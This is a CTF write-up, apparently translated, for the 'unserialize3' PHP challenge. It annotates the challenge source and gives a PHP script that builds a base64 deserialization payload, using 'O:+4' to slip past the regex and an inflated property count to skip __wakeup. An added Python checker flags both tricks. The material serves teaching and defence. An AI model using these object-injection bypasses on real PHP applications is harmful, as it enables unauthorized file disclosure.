Solution to the problem of unserialize3 in the advanced web area of the attack and defense world
2022-07-08 00:16:00 【B_ secretary】
<?php
class Demo {
private $file = 'index.php';
// Constructor: called automatically when the object is created. The leading double underscore marks a magic method, which PHP invokes automatically once its condition is met
public function __construct($file) {
$this->file = $file;
// "->" in PHP plays the role of "." in Python: it accesses an object's members
}
// Destructor: called automatically when the object is destroyed
function __destruct() {
echo @highlight_file($this->file, true);
}
// Prints the contents of $file with syntax highlighting, i.e. shows the file to the reader
/* highlight_file(filename, return) highlights the syntax of a file; when the return parameter is set to true the function returns the highlighted code instead of outputting it.
Taken together, this means that when the object is destroyed the code of $file is output. The at sign (@) is PHP's error control operator: any error messages the expression would produce are suppressed. */
// Called automatically during deserialization
function __wakeup() {
if ($this->file != 'index.php') {
//the secret is in the fl4g.php
$this->file = 'index.php';
}
// Resets the file name to "index.php"
}
}
if (isset($_GET['var'])) {
/* Checks whether the variable var exists, i.e. is set and not NULL; here it detects whether a var parameter was passed in the GET request */
$var = base64_decode($_GET['var']);
// base64-decode var
if (preg_match('/[oc]:\d+:/i', $var)) {
// Checks whether var contains an object or class marker such as "O:4:"
die('stop hacking!');
} else {
@unserialize($var);
// Deserialize var; this invokes __wakeup
}
} else {
highlight_file("index.php");
// Highlights index.php, which is not the result we want
}
?>
The challenge source tells us the flag is in fl4g.php, so we want to read that file. The payload therefore needs to:
1、 not match preg_match, or otherwise bypass the preg_match check
2、 bypass the __wakeup function during deserialization
So we serialize an object and pass it in as var, with its file property set to fl4g.php; when the object is destroyed, the destructor displays fl4g.php.
Code to construct the payload:
<?php
class Demo {
private $file = 'index.php';
public function __construct($file) {
$this->file = $file;
}
function __destruct() {
echo @highlight_file($this->file, true);
}
function __wakeup() {
if ($this->file != 'index.php') {
$this->file = 'index.php';
}
}
}
$payload = new Demo('fl4g.php');// Create a Demo object whose file property is fl4g.php
$payload = serialize($payload);// Serialize it
$payload = str_replace('O:4', 'O:+4',$payload);
// Replace "O:4" with "O:+4" so that the regex no longer matches
$payload = str_replace(':1:', ':2:' ,$payload);
// Change the property count recorded in the serialized string from "1" to "2" to bypass __wakeup (if the recorded count is larger than the real number of properties, __wakeup is skipped)
// The private property name is serialized with non-printable null bytes (\0Demo\0file, i.e. %00 when URL-encoded); they must be kept in the payload, which the base64 encoding below preserves
echo base64_encode($payload); // base64-encode the parameter and print it
?>
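As an added defender-side example (not part of the original writeup), the following Python checks a base64-decoded `var` value structurally instead of with the challenge's regex, flagging both tricks the payload above relies on: the signed class-name length that slips past `/[oc]:\d+:/i`, and the inflated property count that skips `__wakeup`. The sample inputs are constructed; `C:` custom-serialized objects are treated as unsupported.

```python
import re

# Constructed samples (not from the original post): the base64-decoded `var` value that
# the writeup's payload produces, and a harmless serialized array for comparison.
SAMPLE_EVASION = 'O:+4:"Demo":2:{s:10:"\x00Demo\x00file";s:8:"fl4g.php";}'
SAMPLE_BENIGN = 'a:2:{i:0;s:3:"foo";i:1;b:1;}'

def page_filter_matches(s):
    """The challenge's own check: a bare regex that 'O:+4' slips past."""
    return re.search(r'[oc]:\d+:', s, re.I) is not None

def parse(s, i, findings):
    """Parse one PHP-serialized value at s[i], recording anomalies; return the index after it."""
    t = s[i]
    if t in 'Nbid':                                 # N;  b:1;  i:42;  d:1.5;
        return s.index(';', i) + 1
    if t == 's':                                    # s:<len>:"<bytes>";
        j = s.index(':', i + 2)
        return j + int(s[i + 2:j]) + 4
    if t == 'O':                                    # O:<len>:"<class>":<count>:{...}
        j = s.index(':', i + 2)
        ln = s[i + 2:j]
        if not ln.isdigit():                        # '+4', '-0' etc. defeat a naive \d+ filter
            findings.append(f'O: class-name length {ln!r} is not plain digits')
        findings.append(f'serialized object of class {s[j + 2:j + 2 + int(ln)]}')
        k = j + int(ln) + 4                         # start of the member count
    elif t == 'a':                                  # a:<count>:{...}
        k = i + 2
    else:
        raise ValueError(f'unsupported type tag {t!r}')   # e.g. C: custom-serialized objects
    end = s.index(':', k)
    declared = int(s[k:end])
    pos, actual = end + 2, 0                        # pos = first byte after '{'
    while s[pos] != '}':
        pos = parse(s, pos, findings)               # key / property name
        pos = parse(s, pos, findings)               # value
        actual += 1
    if actual != declared:                          # the count-inflation trick that skips __wakeup
        findings.append(f'{t}: declares {declared} members but contains {actual}')
    return pos + 1

def inspect_serialized(s):
    """Return anomaly strings for a decoded `var` value; an empty list means nothing flagged."""
    findings = []
    try:
        if parse(s, 0, findings) != len(s):
            findings.append('trailing bytes after serialized value')
    except (ValueError, IndexError):
        findings.append('malformed serialized data')
    return findings
```

Any serialized object at all is reported, since the endpoint never legitimately expects one; the two extra findings on the sample show why a structural parse catches what the regex misses.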